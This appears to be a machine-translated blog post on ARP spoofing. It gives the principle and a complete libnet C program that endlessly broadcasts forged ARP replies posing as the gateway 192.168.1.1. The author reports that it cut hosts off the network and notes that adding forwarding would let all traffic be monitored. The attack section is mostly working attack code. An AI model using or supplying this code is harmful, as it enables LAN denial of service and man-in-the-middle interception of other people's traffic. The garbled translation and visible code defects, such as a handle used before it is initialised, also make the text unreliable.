Linux uses libnet to implement ARP attack script principle analysis in case of being attacked _linux

Free to do nothing, with Libnet wrote a simple ARP attack. ARP attacks were not particularly common in the past, but there have been two instances of ARP spoofing in recent work. In fact, the principle of ARP spoofing simple drop, most of them are in the local area network to send fake ARP broadcast packets, broadcast package is the purpose of what? Very simple, deceive the intranet of all the hosts, tell the victim host, "I" is the gateway. When the intranet machine receives this broadcast packet, it refreshes its own ARP cache table and binds the IP of the gateway to the source MAC in the broadcast packet. This attacks the machine to achieve the purpose of posing as a gateway.
The last university was an ARP spoofing attack, their school home page opened will jump out of many other messy pages,,,,,, and then view their Web server source code, found not to be inserted into these <iframe> will play the page code, but in the browser extranet access, This code appears, it is obvious that the return of the site's client data was hijacked on the way modified (insert some code).

The following implementation is simpler, only cheat, do not do forwarding, the result is the LAN all the main opportunity to break the network. Test, the network master opportunity can not access the Internet, Ann 360ARP protection will alarm, can surf the internet, is a bit slow speed, but identified the attack host seems inaccurate, tried several times to identify the normal computer in attack, do not know whether the 360 identification through the source MAC address recognition or how to identify.

Copy Code code as follows:

#include "Arp.h"

int main (int argc,char **argv) {
libnet_t *l;
int i,packet_size; The length of the packet sent
libnet_ptag_t Arp_tag,ether_tag;
Char *device= "eth0";
Char Err_buf[libnet_errbuf_size];
Char *destion_ip_str = "255.255.255.255";
Char *source_ip_str = "192.168.1.1";
U_char source_hardware[6]={0x00,0x0c,0x29,0x68,0x95,0x84};
U_char Destion_hardware[6]={0xff,0xff,0xff,0xff,0xff,0xff};
u_int32_t source_ip,destion_ip;
Converts a character-form IP to a network byte order
Source_ip = LIBNET_NAME2ADDR4 (l,source_ip_str,libnet_resolve);
Destion_ip = LIBNET_NAME2ADDR4 (l,destion_ip_str,libnet_resolve);
Initialize Libnet handle
L = libnet_init (LIBNET_LINK,DEVICE,ERR_BUF);
if (L = = NULL) {
printf ("Initialize Libnet handle failed:%s\n", err_buf);
Exit (-1);
}
Arp_tag = Libnet_build_arp (
Arphrd_ether,//hardware address type, here is the Ethernet type
ETHERTYPE_IP,//protocol address type
6,
4,
Arpop_reply,//arp answer.
Source_hardware,
(u_int8_t *) &source_ip,
Destion_hardware,
(u_int8_t *) &destion_ip,
NULL,//No load
0,//load length of 0
L
0//Protocol block token, 0 for new protocol block
);
Ether_tag = Libnet_build_ethernet (
(u_int8_t *) &destion_hardware,
(u_int8_t *) &source_hardware,
Ethertype_arp,
Null
0,
L
0
);
i = 0;
while (1) {
Packet_size = Libnet_write (l); Send constructed ARP Packets
Usleep (10);
i++;
}
printf ("Packet length:%d\n", packet_size);
Libnet_destroy (l);
return 0;
}

Target MAC for broadcast address, all 0xff on the line, the source MAC address can be a local Mac or fake Mac (in the program to obtain the local Mac available IOCTL function, recently in the Write DDoS attack program is to use IOCTL to obtain the local Mac and IP), Note that the ARP package type is arpop_reply (Answer package).
If you do not want to break the net, only cheat, the data sent over, to be forwarded to the correct gateway, so as to ensure that the intranet network is normal, and all the data are monitored